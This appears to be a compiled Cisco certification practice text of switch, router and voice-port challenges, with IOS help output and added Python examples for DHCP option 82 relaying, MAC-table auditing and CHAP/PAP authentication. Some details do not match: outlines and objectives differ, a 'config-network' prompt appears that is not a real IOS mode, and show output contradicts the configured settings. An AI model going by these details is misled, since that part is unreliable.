option     Insert relay information in BOOTREQUEST
policy     Define reforwarding policy
trust-all  Received DHCP packets may contain relay info option with zero giaddr
(config)# ip dhcp relay information option ?
<cr>
(config)# ip dhcp relay information option
(config)# ip dhcp relay information policy ?
drop     Do not forward BOOTREQUEST message with existing information
keep     Leave existing information alone
replace  Replace exisiting information
(config)# ip dhcp relay information policy drop
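The relay agent information option (option 82) is what the `ip dhcp relay information option` and `policy` commands above control. As an added example, not code from the NetworkSims page or from Cisco, the Python below models a relay that inserts option 82 (circuit ID and remote ID sub-options) into client BOOTREQUESTs, applies the drop/keep/replace reforwarding policy when a request already carries option 82, and performs the `check` of a returning BOOTREPLY. The relay address, port names, transaction ID and client MAC are constructed sample values, and the model is deliberately simplified (no server side, no `trust-all` handling).

```python
# Added example (not from the NetworkSims page or Cisco): a small model of how a
# DHCP relay agent applies `ip dhcp relay information option` (insert option 82)
# and `ip dhcp relay information policy {drop|keep|replace}` to BOOTREQUESTs that
# already carry option 82, plus the `check` of a returning BOOTREPLY.
# All packets, addresses and IDs below are constructed sample values.

BOOTREQUEST, BOOTREPLY = 1, 2
OPT_RELAY_INFO, OPT_PAD, OPT_END = 82, 0, 255
SUB_CIRCUIT_ID, SUB_REMOTE_ID = 1, 2
MAGIC = b"\x63\x82\x53\x63"   # DHCP magic cookie that follows the 236-byte BOOTP header
HDR_LEN = 236
GIADDR_OFF = 24               # giaddr occupies bytes 24..27 of the header
ZERO_IP = b"\0\0\0\0"


def encode_options(options):
    return b"".join(bytes([c, len(v)]) + v for c, v in options) + bytes([OPT_END])


def build_dhcp(op, xid, chaddr, giaddr=ZERO_IP, options=()):
    """Build a DHCP message; options is a sequence of (code, value) pairs."""
    hdr = (bytes([op, 1, 6, 0]) + xid + b"\0\0" + b"\0\0"        # op htype hlen hops xid secs flags
           + ZERO_IP * 3 + giaddr                                 # ciaddr yiaddr siaddr giaddr
           + chaddr.ljust(16, b"\0") + b"\0" * 64 + b"\0" * 128)  # chaddr sname file
    assert len(hdr) == HDR_LEN
    return hdr + MAGIC + encode_options(options)


def parse_dhcp(pkt):
    """Return (op, giaddr, [(code, value), ...]) for a DHCP message."""
    if pkt[HDR_LEN:HDR_LEN + 4] != MAGIC:
        raise ValueError("not a DHCP message")
    i, opts = HDR_LEN + 4, []
    while i < len(pkt) and pkt[i] != OPT_END:
        if pkt[i] == OPT_PAD:
            i += 1
            continue
        code, length = pkt[i], pkt[i + 1]
        opts.append((code, pkt[i + 2:i + 2 + length]))
        i += 2 + length
    return pkt[0], pkt[GIADDR_OFF:GIADDR_OFF + 4], opts


def relay_info(circuit_id, remote_id):
    """Encode the option 82 sub-options a relay inserts for the client-facing port."""
    return (bytes([SUB_CIRCUIT_ID, len(circuit_id)]) + circuit_id
            + bytes([SUB_REMOTE_ID, len(remote_id)]) + remote_id)


def rebuild(pkt, giaddr, options):
    """Keep the original header (xid, chaddr, ...) but patch giaddr and rewrite the options."""
    return pkt[:GIADDR_OFF] + giaddr + pkt[GIADDR_OFF + 4:HDR_LEN] + MAGIC + encode_options(options)


def relay_request(pkt, relay_ip, circuit_id, remote_id, policy="replace"):
    """Forward a client BOOTREQUEST toward the server; returns the packet to send or None if dropped."""
    op, giaddr, opts = parse_dhcp(pkt)
    if op != BOOTREQUEST:
        raise ValueError("relay_request expects a BOOTREQUEST")
    mine = relay_info(circuit_id, remote_id)
    if any(c == OPT_RELAY_INFO for c, _ in opts):
        # A request that already carries option 82 either passed another relay or was
        # crafted by the client; the reforwarding policy decides what happens to it.
        if policy == "drop":
            return None
        if policy == "keep":
            new_opts = opts
        elif policy == "replace":
            new_opts = [(c, v) for c, v in opts if c != OPT_RELAY_INFO] + [(OPT_RELAY_INFO, mine)]
        else:
            raise ValueError(f"unknown policy {policy!r}")
    else:
        new_opts = opts + [(OPT_RELAY_INFO, mine)]
    if giaddr == ZERO_IP:
        giaddr = relay_ip  # the first relay hop stamps its own address so the server replies to it
    return rebuild(pkt, giaddr, new_opts)


def relay_reply(pkt, circuit_id, remote_id):
    """`information check`: a BOOTREPLY must echo exactly the option 82 this relay inserted;
    the option is then stripped before the reply is forwarded to the client."""
    op, giaddr, opts = parse_dhcp(pkt)
    if op != BOOTREPLY:
        raise ValueError("relay_reply expects a BOOTREPLY")
    echoed = [v for c, v in opts if c == OPT_RELAY_INFO]
    if echoed != [relay_info(circuit_id, remote_id)]:
        return None
    return rebuild(pkt, giaddr, [(c, v) for c, v in opts if c != OPT_RELAY_INFO])


def get_relay_info(pkt):
    """Return the raw option 82 value carried by a message, or None."""
    return next((v for c, v in parse_dhcp(pkt)[2] if c == OPT_RELAY_INFO), None)


if __name__ == "__main__":
    # Constructed sample: a DHCPDISCOVER (option 53 = 1) from a client on Fa0/2 of switch sw1.
    req = build_dhcp(BOOTREQUEST, b"\x12\x34\x56\x78", b"\xaa\xbb\xcc\xdd\xee\xff", options=[(53, b"\x01")])
    fwd = relay_request(req, bytes([192, 168, 0, 1]), b"Fa0/2", b"sw1")
    print("giaddr", list(parse_dhcp(fwd)[1]), "option 82", get_relay_info(fwd))
```

With `policy drop`, the setting this challenge applies, a request that arrives already carrying option 82 is discarded rather than passed on with someone else's circuit ID; `keep` would hand that foreign circuit ID to the server and to anything (such as DHCP snooping bindings) that keys on it.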

Cisco Switch Challenge 133


Area: Switches Static MAC setup
Outline
MAC address notification allows the tracking of MAC address activity through SNMP, using
a trap which sends information to an SNMP server when there is activity. The trap interval
defines the time at which the updates will be sent to the SNMP server, which can reduce
network traffic when there is a great deal of MAC address activity.
Objectives
The objectives of this challenge are to:

Define static MAC addresses.

The commands used are:


# config t
(config)# mac address-table static 1.1.1 vlan 1 interface fa0/1
(config)# mac address-table static 1.1.2 vlan 1 interface fa0/2

Example
# config t
(config)# mac add ?
aging-time
Set MAC address table entry maximum age
notification Enable/Disable MAC Notification on the switch
static
static keyword
(config)# mac add s ?
H.H.H 48 bit mac address
(config)# mac add s 1.1.1 ?
vlan VLAN keyword
(config)# mac add s 1.1.1 v ?
<1-4094> VLAN id of mac address table
(config)# mac add s 1.1.1 v 1 ?
drop
drop frames
interface interface
Switch(config)# mac add s 1.1.1 v 1 interface ?
FastEthernet
FastEthernet IEEE 802.3
GigabitEthernet GigabitEthernet IEEE 802.3z
Port-channel
Ethernet Channel of interfaces
(config)# mac address-table static 1.1.1 vlan 1 interface fa0/1
(config)# mac address-table static 1.1.2 vlan 1 interface fa0/2
# sh mac address-table static
          Mac Address Table
-------------------------------------------

Vlan    Mac Address       Type        Ports
----    -----------       --------    -----
 All    0012.00b0.2780    STATIC      CPU
 All    0012.00b0.2781    STATIC      CPU
 All    0012.00b0.2782    STATIC      CPU
 All    0012.00b0.2783    STATIC      CPU
 All    0012.00b0.2784    STATIC      CPU
 All    0012.00b0.2785    STATIC      CPU
 All    0012.00b0.2786    STATIC      CPU
 All    0012.00b0.2787    STATIC      CPU
 All    0012.00b0.2788    STATIC      CPU
 All    0012.00b0.2789    STATIC      CPU
 All    0012.00b0.278a    STATIC      CPU
 All    0012.00b0.278b    STATIC      CPU
 All    0012.00b0.278c    STATIC      CPU
 All    0012.00b0.278d    STATIC      CPU
 All    0012.00b0.278e    STATIC      CPU
 All    0012.00b0.278f    STATIC      CPU
 All    0012.00b0.2790    STATIC      CPU
 All    0012.00b0.2791    STATIC      CPU
 All    0012.00b0.2792    STATIC      CPU
 All    0012.00b0.2793    STATIC      CPU
 All    0012.00b0.2794    STATIC      CPU
 All    0012.00b0.2795    STATIC      CPU
 All    0012.00b0.2796    STATIC      CPU
 All    0012.00b0.2797    STATIC      CPU
 All    0012.00b0.2798    STATIC      CPU
 All    0012.00b0.2799    STATIC      CPU
 All    0012.00b0.279a    STATIC      CPU
 All    0100.0c00.0000    STATIC      CPU
 All    0100.0ccc.cccc    STATIC      CPU
 All    0100.0ccc.cccd    STATIC      CPU
 All    0100.0ccd.cdce    STATIC      CPU
 All    0180.c200.0000    STATIC      CPU
 All    0180.c200.0001    STATIC      CPU
 All    0180.c200.0002    STATIC      CPU
 All    0180.c200.0003    STATIC      CPU
 All    0180.c200.0004    STATIC      CPU
 All    0180.c200.0005    STATIC      CPU
 All    0180.c200.0006    STATIC      CPU
 All    0180.c200.0007    STATIC      CPU
 All    0180.c200.0008    STATIC      CPU
 All    0180.c200.0009    STATIC      CPU
 All    0180.c200.000a    STATIC      CPU
 All    0180.c200.000b    STATIC      CPU
 All    0180.c200.000c    STATIC      CPU
 All    0180.c200.000d    STATIC      CPU
 All    0180.c200.000e    STATIC      CPU
 All    0180.c200.000f    STATIC      CPU
 All    0180.c200.0010    STATIC      CPU
Total Mac Addresses for this criterion: 48
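As an added example (not from the NetworkSims page or Cisco IOS), the Python below parses `show mac address-table` output in the layout printed above and checks the static entries against what the operator configured, reporting entries that are missing, were learned dynamically instead, or sit on a different port. The table text is a constructed sample; the expansion of `1.1.1` to `0001.0001.0001` assumes IOS pads each H.H.H group to four hex digits.

```python
# Added example (not from the NetworkSims page or Cisco IOS): parse the text of
# `show mac address-table` and check that the static entries an operator configured
# are present on the expected ports.  The table text below is a constructed sample
# in the layout IOS prints; the expected bindings mirror the two `mac address-table
# static` commands in the challenge.  Expanding "1.1.1" to 0001.0001.0001 assumes
# IOS pads each H.H.H group to four hex digits, which normalize_mac does explicitly.
import re

# One table row: vlan ("All" or a number), H.H.H address, type, port(s).
ROW = re.compile(r"^\s*(All|\d+)\s+([0-9a-f]{4}\.[0-9a-f]{4}\.[0-9a-f]{4})\s+(\S+)\s+(\S+)\s*$", re.I)


def normalize_mac(mac):
    """Canonical H.H.H form: 'aaaa.bbbb.cccc', lower-case, each group zero-padded."""
    groups = mac.lower().split(".")
    if len(groups) != 3:
        raise ValueError(f"not an H.H.H address: {mac!r}")
    return ".".join(f"{int(g, 16):04x}" for g in groups)


def parse_mac_table(text):
    """Return one dict per table row: vlan (int, or None for 'All'), mac, type, port."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line)
        if not m:
            continue  # title, column headers, separators and the total line
        vlan, mac, typ, port = m.groups()
        rows.append({"vlan": None if vlan.lower() == "all" else int(vlan),
                     "mac": normalize_mac(mac), "type": typ.upper(), "port": port})
    return rows


def check_static_bindings(rows, expected):
    """expected maps (mac, vlan) -> port.  Returns a list of (mac, vlan, problem) findings."""
    seen = {(r["mac"], r["vlan"]): r for r in rows}
    findings = []
    for (mac, vlan), port in expected.items():
        key = (normalize_mac(mac), vlan)
        row = seen.get(key)
        if row is None:
            findings.append((key[0], vlan, "static entry missing"))
        elif row["type"] != "STATIC":
            findings.append((key[0], vlan, f"learned dynamically on {row['port']}, not static"))
        elif row["port"] != port:
            findings.append((key[0], vlan, f"expected {port}, found {row['port']}"))
    return findings


# Constructed sample output: the two FastEthernet rows stand in for the
# `mac address-table static 1.1.1 vlan 1 interface fa0/1` and `... 1.1.2 ... fa0/2`
# entries, with the second deliberately shown on the wrong port.
SAMPLE_TABLE = """\
          Mac Address Table
-------------------------------------------

Vlan    Mac Address       Type        Ports
----    -----------       --------    -----
 All    0100.0ccc.cccc    STATIC      CPU
 All    0180.c200.0000    STATIC      CPU
   1    0001.0001.0001    STATIC      Fa0/1
   1    0001.0001.0002    STATIC      Fa0/3
   1    0012.00b0.27a0    DYNAMIC     Fa0/5
Total Mac Addresses for this criterion: 5
"""

EXPECTED = {("1.1.1", 1): "Fa0/1", ("1.1.2", 1): "Fa0/2"}


def audit(text=SAMPLE_TABLE, expected=EXPECTED):
    """Run the check over a show output and return the findings."""
    return check_static_bindings(parse_mac_table(text), expected)


if __name__ == "__main__":
    for mac, vlan, problem in audit():
        print(f"vlan {vlan} {mac}: {problem}")
```

Feed the function the captured output of `show mac address-table` (not just the `static` view) so that an expected address that the switch is learning dynamically on some other port is reported as well.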

Cisco Switch Challenge 134


Area: Switches SDR (Session Announcement Protocol (SAP) designated router) listener
Outline
This challenge defines setting up an SDR listening on the switch.
Objectives
The objectives of this challenge are to:

Define SDR cache timeout.
Define SDR listener on an interface.

The commands used are:


# config t
(config)# ip sdr cache-timeout 10
(config)# int fa0/1
(config-if)# no switchport
(config-if)# ip sdr listen
(config)# int fa0/2
(config-if)# no switchport
(config-if)# ip sdr listen
(config)# int fa0/3
(config-if)# no switchport
(config-if)# ip sdr listen

Notes
# config t
(config)# ip sdr ?
cache-timeout Timeout period for entries
(config)#ip sdr cache-timeout ?
<1-4294967295> Timeout in minutes
(config)#ip sdr cache-timeout 10 ?
<cr>
(config)#ip sdr cache-timeout 10
(config)# int fa0/1
(config-if)# no switchport
(config-if)# ip ?
Interface IP configuration subcommands:
access-group
Specify access control for packets
accounting
Enable IP accounting on this interface
address
Set the IP address of an interface
authentication
authentication subcommands
bandwidth-percent
Set EIGRP bandwidth limit
bgp
BGP interface commands
broadcast-address
Set the broadcast address of an interface
cef
Cisco Express Fowarding interface commands
cgmp
Enable/disable CGMP
dhcp
Configure DHCP parameters for this interface
directed-broadcast Enable forwarding of directed broadcasts
dvmrp
DVMRP interface commands
hello-interval
Configures IP-EIGRP hello interval
helper-address
Specify a destination address for UDP broadcasts
hold-time
Configures IP-EIGRP hold time
igmp
IGMP interface commands
irdp
ICMP Router Discovery Protocol
load-sharing
Style of load sharing
local-proxy-arp
Enable local-proxy ARP
mask-reply
Enable sending ICMP Mask Reply messages
mrm
Configure IP Multicast Routing Monitor tester
mroute-cache
Enable switching cache for incoming multicast packets
mtu
Set IP Maximum Transmission Unit
multicast
IP multicast interface commands
ospf
OSPF interface commands

pim
PIM interface commands
policy
Enable policy routing
probe
Enable HP Probe support
proxy-arp
Enable proxy ARP
rarp-server
Enable RARP server for static arp entries
redirects
Enable sending ICMP Redirect messages
rgmp
Enable/disable RGMP
rip
Router Information Protocol
route-cache
Enable fast-switching cache for outgoing packets
sap
Session Advertisement Protocol interface commands
sdr
Session Directory Protocol interface commands
security
DDN IP Security Option
split-horizon
Perform split horizon
summary-address
Perform address summarization
unnumbered
Enable IP processing without an explicit address
unreachables
Enable sending ICMP Unreachable messages
urd
Configure URL Rendezvousing
vrf
VPN Routing/Forwarding parameters on the interface
wccp
WCCP interface commands
(config-if)# ip cgmp ?
proxy
CGMP for hosts and proxy for multicast routers
router-only CGMP proxy for multicast routers only
<cr>
(config-if)# ip cgmp
(config)# int fa0/2
(config-if)# no switchport
(config-if)# ip cgmp proxy
(config)# int fa0/3
(config-if)# no switchport
(config-if)# ip cgmp router-only

23 CCVP (Voice)
Cisco CCVP Test 1
Introduction to Voice Technologies
The most up-to-date version of this test is at:
http://networksims.com/v01.html

Cisco Router Challenge 11


Outline
This challenge involves the configuration of the S0 port on a router.
Objectives
The objectives of this challenge are to:

Setup the IP address on S0 port.
Setup the subnet mask on S0 port.
Enable the S0 port.
Set the description for the S0 port.
Define the speed of the S0 port.
Define EIGRP routing.

Commands
> enable
# config t
(config)# int s0
(config-if)# ip address 138.199.17.1 255.255.255.248
(config-if)# no shutdown
(config-if)# description students
(config-if)# encapsulation ppp
(config-if)# ppp authentication chap
(config-if)# clock rate 56000
(config-if)# carrier-delay 8
(config-if)# bandwidth 198
(config-if)# exit
(config)# router eigrp 111
(config-network)# network 10.0.0.1

Example
> enable
# config t
(config)# int s0
(config-if)# ip address 138.199.17.1 255.255.255.248
(config-if)# no shutdown
(config-if)# description students
(config-if)# encapsulation ?
atm-dxi
ATM-DXI encapsulation
frame-relay Frame Relay networks
hdlc
Serial HDLC synchronous
lapb
LAPB (X.25 Level 2)
ppp
Point-to-Point protocol
smds
Switched Megabit Data Service (SMDS)
x25
X.25
(config-if)# encapsulation ppp
(config-if)# ppp ?
accm
Set initial Async Control Character Map
acfc
Options for HDLC Address & Control Field Compression
authentication Set PPP link authentication method
bridge
Enable PPP bridge translation
chap
Set CHAP authentication parameters
ipcp
Set IPCP negotiation options
lcp
PPP LCP configuration
link
Set miscellaneous link parameters
max-bad-auth
Allow multiple authentication failures
multilink
Make interface multilink capable
pap
Set PAP authentication parameters
pfc
Options for Protocol Field Compression
quality
Set minimum Link Quality before link is down
reliable-link
Use LAPB with PPP to provide a reliable link
timeout
Set PPP timeout parameters
use-tacacs
Use TACACS to verify PPP authentications
(config-if)# ppp authentication ?
chap
Challenge Handshake Authentication Protocol (CHAP)
ms-chap Microsoft Challenge Handshake Authentication Protocol (MS-CHAP)
pap
Password Authentication Protocol (PAP)
(config-if)# ppp authentication chap
(config-if)# clock ?
rate Configure serial interface clock speed
(config-if)# clock rate ?
Speed (bits per second)
1200
2400
4800
9600
14400
19200
28800
32000
38400
56000
57600
64000
72000
115200
125000
128000
148000

192000
250000
256000
384000
500000
512000
768000
800000
1000000
1300000
2000000
4000000
8000000
<300-4000000>
Choose clockrate from list above
(config-if)# clock rate 56000
(config-if)# carrier-delay 8
(config-if)# bandwidth 198
(config-if)# exit
(config)# router eigrp 111
(config-network)# network 10.0.0.1
# sh running

Cisco Router Challenge 12


Outline
This challenge involves the configuration of the S1 port on a router.
Objectives
The objectives of this challenge are to:

Setup the IP address on S1 port.
Setup encapsulation on the S1 port.
Setup authentication on the S1 port.
Define other S1 parameters.

Example
> enable
# config t
(config)# int s1
(config-if)# ip address 46.187.202.5 254.0.0.0
(config-if)# no shutdown
(config-if)# description academics
(config-if)# encapsulation ppp
(config-if)# ppp authentication pap
(config-if)# clock rate 56000
(config-if)# bandwidth 63
(config-if)# exit
(config)# router eigrp 111
(config-network)# network 10.0.0.1
# sh running
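Challenge 11 enables CHAP on S0 and Challenge 12 enables PAP on S1. As an added example (not from the NetworkSims page or Cisco), the Python below runs both sides of the CHAP exchange from RFC 1994 and builds the PAP Authenticate-Request from RFC 1334 for comparison; the router names and the shared secret are constructed sample values. It shows that the CHAP response is an MD5 digest over the identifier, the secret and a fresh random challenge, so the secret never crosses the link and a captured response is useless against a later challenge, whereas PAP carries the password in clear.

```python
# Added example (not from the NetworkSims page or Cisco): both sides of the PPP
# CHAP exchange that `ppp authentication chap` turns on (RFC 1994), next to the
# PAP Authenticate-Request that `ppp authentication pap` sends (RFC 1334).
# Router names and the shared secret are constructed sample values.
import hashlib
import hmac
import os

CHAP_CHALLENGE, CHAP_RESPONSE, CHAP_SUCCESS, CHAP_FAILURE = 1, 2, 3, 4


def chap_packet(code, ident, value=b"", name=b""):
    """Encode a CHAP packet: Code, Identifier, Length, then Value-Size/Value/Name for
    Challenge and Response, or a plain message for Success and Failure."""
    if code in (CHAP_CHALLENGE, CHAP_RESPONSE):
        data = bytes([len(value)]) + value + name
    else:
        data = value
    return bytes([code, ident]) + (4 + len(data)).to_bytes(2, "big") + data


def chap_parse(pkt):
    """Return (code, identifier, value, name) for a CHAP packet."""
    code, ident = pkt[0], pkt[1]
    data = pkt[4:int.from_bytes(pkt[2:4], "big")]
    if code in (CHAP_CHALLENGE, CHAP_RESPONSE):
        size = data[0]
        return code, ident, data[1:1 + size], data[1 + size:]
    return code, ident, data, b""


def chap_response_value(ident, secret, challenge):
    """MD5(Identifier || secret || Challenge): the only secret-derived value sent on the link."""
    return hashlib.md5(bytes([ident]) + secret + challenge).digest()


class Authenticator:
    """The router configured with `ppp authentication chap`; secrets maps peer name -> secret."""

    def __init__(self, name, secrets):
        self.name, self.secrets, self.pending = name, secrets, {}

    def challenge(self, ident):
        value = os.urandom(16)          # a fresh random challenge for every attempt
        self.pending[ident] = value
        return chap_packet(CHAP_CHALLENGE, ident, value, self.name.encode())

    def verify(self, pkt):
        code, ident, response, peer = chap_parse(pkt)
        challenge = self.pending.pop(ident, None)   # each challenge is usable exactly once
        secret = self.secrets.get(peer.decode(errors="replace"))
        if code != CHAP_RESPONSE or challenge is None or secret is None:
            return chap_packet(CHAP_FAILURE, ident, b"no outstanding challenge or unknown peer")
        expected = chap_response_value(ident, secret, challenge)
        if hmac.compare_digest(expected, response):
            return chap_packet(CHAP_SUCCESS, ident, b"welcome")
        return chap_packet(CHAP_FAILURE, ident, b"authentication failed")


class Peer:
    """The router being authenticated; it never transmits the secret itself."""

    def __init__(self, name, secret):
        self.name, self.secret = name, secret

    def respond(self, pkt):
        code, ident, challenge, _authenticator_name = chap_parse(pkt)
        if code != CHAP_CHALLENGE:
            raise ValueError("expected a CHAP Challenge")
        value = chap_response_value(ident, self.secret, challenge)
        return chap_packet(CHAP_RESPONSE, ident, value, self.name.encode())


def run_chap(auth, peer, ident=1):
    """Run Challenge -> Response -> Success/Failure; returns (succeeded, response_packet)."""
    response = peer.respond(auth.challenge(ident))
    result = auth.verify(response)
    return chap_parse(result)[0] == CHAP_SUCCESS, response


def pap_authenticate_request(ident, peer_id, password):
    """PAP Authenticate-Request: Peer-ID and Password travel in clear text."""
    data = bytes([len(peer_id)]) + peer_id + bytes([len(password)]) + password
    return bytes([1, ident]) + (4 + len(data)).to_bytes(2, "big") + data


if __name__ == "__main__":
    auth = Authenticator("mars", {"venus": b"s3cret"})
    ok, response = run_chap(auth, Peer("venus", b"s3cret"))
    print("CHAP succeeded:", ok, "| secret visible on the wire:", b"s3cret" in response)
    print("PAP secret visible on the wire:", b"s3cret" in pap_authenticate_request(1, b"venus", b"s3cret"))
```

On IOS the CHAP name defaults to the hostname and the secret is looked up in the matching `username <peer> password <secret>` entry, so both routers need such an entry for the other; that part of the configuration is outside these challenges.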

Cisco CCVP Test 2


Introduction to Voice Technologies
The most up-to-date version of this test is at:
http://networksims.com/v02.html

Cisco Router Challenge 211


Outline
This challenge involves the configuration of FXS (Foreign Exchange Station) Voice Port
Configuration on a Voice-enabled router. Some routers have FXS interfaces which can
connect to a standard telephone, fax machine, or similar device and thus must provide
ringing, voltage supplies, and a dial tone. Normally the FXS interface uses an RJ-11
connector to connect to telephone equipment.
Objectives
The objectives of this challenge are to:

Define FXS Voice Port details.
Define FXS country details.

Outline
> enable
# sh version
# config t
(config)# voice-port 1/0/0
(config-voiceport)# signal groundstart
(config-voiceport)# cptone GB
(config-voiceport)# ring cadence pattern01
(config-voiceport)# exit
(config)# exit
# show voice port
# show voice dsp

Example
> enable
# sh version

Cisco IOS Software, C2600 Software (C2600-ADVENTERPRISEK9-M), Version 12.4(12), RELEASE SOFTWARE (fc1)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2006 by Cisco Systems, Inc.
Compiled Fri 17-Nov-06 11:18 by prod_rel_team
ROM: System Bootstrap, Version 12.2(7r) [cmong 7r], RELEASE SOFTWARE (fc1)
Router uptime is 5 hours, 38 minutes
System returned to ROM by power-on
System image file is "flash:c2600-testk9-mz.124-12.bin"
Cisco 2611XM (MPC860P) processor (revision 1.0) with 111616K/19456K bytes of memory.
Processor board ID JAD07130QPE
M860 processor: part number 5, mask 2
2 FastEthernet interfaces
2 Serial(sync/async) interfaces
2 Voice FXO interfaces
2 Voice FXS interfaces
32K bytes of NVRAM.
49152K bytes of processor board System flash (Read/Write)
Configuration register is 0x3162
# config t
(config)# voice-port ?
(config)# voice-port 1/0/0
(config-voiceport)# signal ?
groundStart Ground Start
loopStart
Loop Start
(config-voiceport)# signal groundstart
(config-voiceport)# cptone ?
locale  2 letter ISO-3166 country code
  AR  Argentina
  AU  Australia
  AT  Austria
  BE  Belgium
  BR  Brazil
  CA  Canada
  CN  China
  CO  Colombia
  C1  Custom1
  C2  Custom2
  CY  Cyprus
  CZ  Czech Republic
  DK  Denmark
  EG  Egypt
  FI  Finland
  FR  France
  DE  Germany
  GH  Ghana
  GR  Greece
  HK  Hong Kong
  HU  Hungary
  IS  Iceland
  IN  India
  ID  Indonesia
  IE  Ireland
  IL  Israel
  IT  Italy
  JP  Japan
  JO  Jordan
  KE  Kenya
  KR  Korea Republic
  LB  Lebanon
  LU  Luxembourg
  MY  Malaysia
  MX  Mexico
  NP  Nepal
  NL  Netherlands
  NZ  New Zealand
  NG  Nigeria
  NO  Norway
  PK  Pakistan
  PA  Panama
  PE  Peru
  PH  Philippines
  PL  Poland
  PT  Portugal
  RU  Russian Federation
  SA  Saudi Arabia
  SG  Singapore
  SK  Slovakia
  SI  Slovenia
  ZA  South Africa
  ES  Spain
  SE  Sweden
  CH  Switzerland
  TW  Taiwan
  TH  Thailand
  TR  Turkey
  GB  United Kingdom
  US  United States
  VE  Venezuela
  ZW  Zimbabwe
(config-voiceport)# cptone GB
(config-voiceport)# ring ?
cadence
Ringing cadence on/off durations
frequency The ring frequency to be used in the FXS interface
(config-voiceport)# ring cadence ?
define     User Defined Cadence
pattern01  2sec on 4sec off
pattern02  1sec on 4sec off
pattern03  1.5sec on 3.5sec off
pattern04  1sec on 2sec off
pattern05  1sec on 5sec off
pattern06  1sec on 3sec off
pattern07  .8sec on 3.2sec off
pattern08  1.5sec on 3sec off
pattern09  1.2sec on 3.7sec off
pattern10  1.2sec on 4.7sec off
pattern11  .4sec on .2sec off .4sec on 2sec off
pattern12  .4sec on .2sec off .4sec on 2.6sec off
(config-voiceport)# ring cadence pattern01


(config-voiceport)# exit
(config)# exit
# sh voice port
Foreign Exchange Station 1/0/0 Slot is 1, Sub-unit is 0, Port is 0
Type of VoicePort is FXS
Operation State is DORMANT
Administrative State is UP
No Interface Down Failure
Description is not set
Noise Regeneration is enabled
Non Linear Processing is enabled
Non Linear Mute is disabled
Non Linear Threshold is -21 dB
Music On Hold Threshold is Set to -38 dBm
In Gain is Set to 0 dB
Out Attenuation is Set to 3 dB
Echo Cancellation is enabled
Echo Cancellation NLP mute is disabled
Echo Cancellation NLP threshold is -21 dB
Echo Cancel Coverage is set to 8 ms
Echo Cancel worst case ERL is set to 6 dB
Playout-delay Mode is set to adaptive
Playout-delay Nominal is set to 60 ms
Playout-delay Maximum is set to 250 ms
Playout-delay Fax is set to 300 ms
Connection Mode is normal
Connection Number is not set
Initial Time Out is set to 10 s
Interdigit Time Out is set to 10 s
Call Disconnect Time Out is set to 60 s
Supervisory Disconnect Time Out is set to 750 ms
Ringing Time Out is set to 180 s
Wait Release Time Out is set to 30 s
Companding Type is u-law
Region Tone is set for US
Analog Info Follows:
Currently processing none
Maintenance Mode Set to None (not in mtc mode)
Number of signaling protocol errors are 0
Impedance is set to 600r Ohm
Station name None, Station number None
Translation profile (Incoming):
Translation profile (Outgoing):
Voice card specific Info Follows:
Signal Type is loopStart

Ring Frequency is 25 Hz
Hook Status is On Hook
Ring Active Status is inactive
Ring Ground Status is inactive
Tip Ground Status is active
Digit Duration Timing is set to 100 ms
InterDigit Duration Timing is set to 100 ms
Hookflash-in Timing is set to max=1000 ms, min=150 ms
Hookflash-out Timing is set to 400 ms
No disconnect acknowledge
Ring Cadence is defined by CPTone Selection
Ring Cadence are [20 40] * 100 msec
Ringer Equivalence Number is set to 1
Foreign Exchange Station 1/0/1 Slot is 1, Sub-unit is 0, Port is 1
Type of VoicePort is FXS
Operation State is DORMANT
Administrative State is UP
No Interface Down Failure
Description is not set
Noise Regeneration is enabled
Non Linear Processing is enabled
Non Linear Mute is disabled
Non Linear Threshold is -21 dB
Music On Hold Threshold is Set to -38 dBm
In Gain is Set to 0 dB
Out Attenuation is Set to 3 dB
Echo Cancellation is enabled
Echo Cancellation NLP mute is disabled
Echo Cancellation NLP threshold is -21 dB
Echo Cancel Coverage is set to 8 ms
Echo Cancel worst case ERL is set to 6 dB
Playout-delay Mode is set to adaptive
Playout-delay Nominal is set to 60 ms
Playout-delay Maximum is set to 250 ms
Playout-delay Minimum mode is set to default, value 40 ms
Playout-delay Fax is set to 300 ms
Connection Mode is normal
Connection Number is not set
Initial Time Out is set to 10 s
Interdigit Time Out is set to 10 s
Call Disconnect Time Out is set to 60 s
Supervisory Disconnect Time Out is set to 750 ms
Ringing Time Out is set to 180 s
Wait Release Time Out is set to 30 s
Companding Type is u-law
Region Tone is set for US
Analog Info Follows:
Currently processing none
Maintenance Mode Set to None (not in mtc mode)
Number of signaling protocol errors are 0
Impedance is set to 600r Ohm
Station name None, Station number None
Translation profile (Incoming):
Translation profile (Outgoing):
Voice card specific Info Follows:
Signal Type is loopStart
Ring Frequency is 25 Hz
Hook Status is On Hook
Ring Active Status is inactive

Ring Ground Status is inactive


Tip Ground Status is active
Digit Duration Timing is set to 100 ms
InterDigit Duration Timing is set to 100 ms
Hookflash-in Timing is set to max=1000 ms, min=150 ms
Hookflash-out Timing is set to 400 ms
No disconnect acknowledge
Ring Cadence is defined by CPTone Selection
Ring Cadence are [20 40] * 100 msec
Ringer Equivalence Number is set to 1
Playout-delay Minimum mode is set to default, value 40 ms
# sh voice dsp
DSP  DSP            DSPWARE CURR  BOOT                          PAK     TX/RX
TYPE NUM CH CODEC   VERSION STATE STATE   RST AI VOICEPORT TS ABORT   PACK COUNT
==== === == ======== ======= ===== ======= === == ========= == ===== ============
C542 001 01 None     4.4.21  IDLE  idle      0  0 1/0/0     NA     0      604/613
C542 002 01 None     4.4.21  IDLE  idle      0  0 1/0/1     NA     0      597/594

Cisco Router Challenge 212


Outline
This challenge involves the configuration of FXO (Foreign Exchange Office) Voice Port
Configuration on a Voice-enabled router. FXS are edge devices whereas the FXO port
connects to the PBX.
Objectives
The objectives of this challenge are to:

Define FXO Voice Port details.

Outline
> enable
# sh version
# config t
(config)# voice-port 1/0/0
(config-voiceport)# signal loopstart
(config-voiceport)# ring number 3
(config-voiceport)# dial-type dtmf

Example
> enable
# sh version
# config t
(config)# voice-port 1/0/0
(config-voiceport)# ?
Voice-port configuration commands:
battery-reversal
Enable FXS battery-reversal generation

bearer-cap
Specify the bear capability
busyout
Configure busyout trigger event & procedure
caller-id
Configure port caller id parameters
comfort-noise
Use fill-silence option
connection
Specify Trunking Parameters
cptone
Configure voice call progress tone locale
default
Set a command to its defaults
description
Description of what this port is connected to
disc_pi_off
close voice path when disconnect with PI received
disconnect-ack
FXS sending disconnect acknowledge
echo-cancel
Echo-cancellation option
exit
Exit from voice-port configuration mode
impedance
Specifies the terminating impedance of the interface
input
Configure input gain for voice
